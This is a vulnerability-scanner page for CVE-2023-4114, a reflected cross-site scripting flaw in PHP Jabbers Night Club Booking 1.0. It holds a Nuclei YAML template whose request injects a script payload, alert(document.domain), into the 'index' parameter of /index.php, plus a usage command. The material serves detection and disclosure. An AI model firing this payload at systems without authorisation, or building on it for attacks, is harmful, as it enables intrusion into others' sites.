PHP Jabbers Night Club Booking 1.0 - Cross Site Scripting

ID: CVE-2023-4114

Severity: medium

Author: r3Y3r53

Tags: cve2023,cve,packetstorm,xss,php,jabbers,phpjabbers

Description

A vulnerability was found in PHP Jabbers Night Club Booking Software 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-235961 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

YAML Source

id: CVE-2023-4114

info:
  name: PHP Jabbers Night Club Booking 1.0 - Cross Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    A vulnerability was found in PHP Jabbers Night Club Booking Software 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-235961 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
  reference:
    - https://www.exploitalert.com/view-details.html?id=39749
    - http://packetstormsecurity.com/files/173932/PHPJabbers-Night-Club-Booking-1.0-Cross-Site-Scripting.html
    - https://nvd.nist.gov/vuln/detail/CVE-2023-4114
    - https://vuldb.com/?ctiid.235961
    - https://vuldb.com/?id.235961
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-4114
    cwe-id: CWE-79
    epss-score: 0.00401
    epss-percentile: 0.73538
    cpe: cpe:2.3:a:phpjabbers:night_club_booking_software:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: phpjabbers
    product: night_club_booking_software
  tags: cve2023,cve,packetstorm,xss,php,jabbers,phpjabbers

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&date="

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "Drinks & Extras", "Checkout", "><script>alert(document.domain)</script>")'
        condition: and
# digest: 4b0a00483046022100cc825e9e0fb230abf60b357235149cdf1cc48631cfed2849d6a6daa38bdc06ce022100ed37fbf5bdcf9871d6bbdeb4847b3970a57f6af6528fba2e2a404ec4fa5af1a1:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-4114.yaml"

View on Github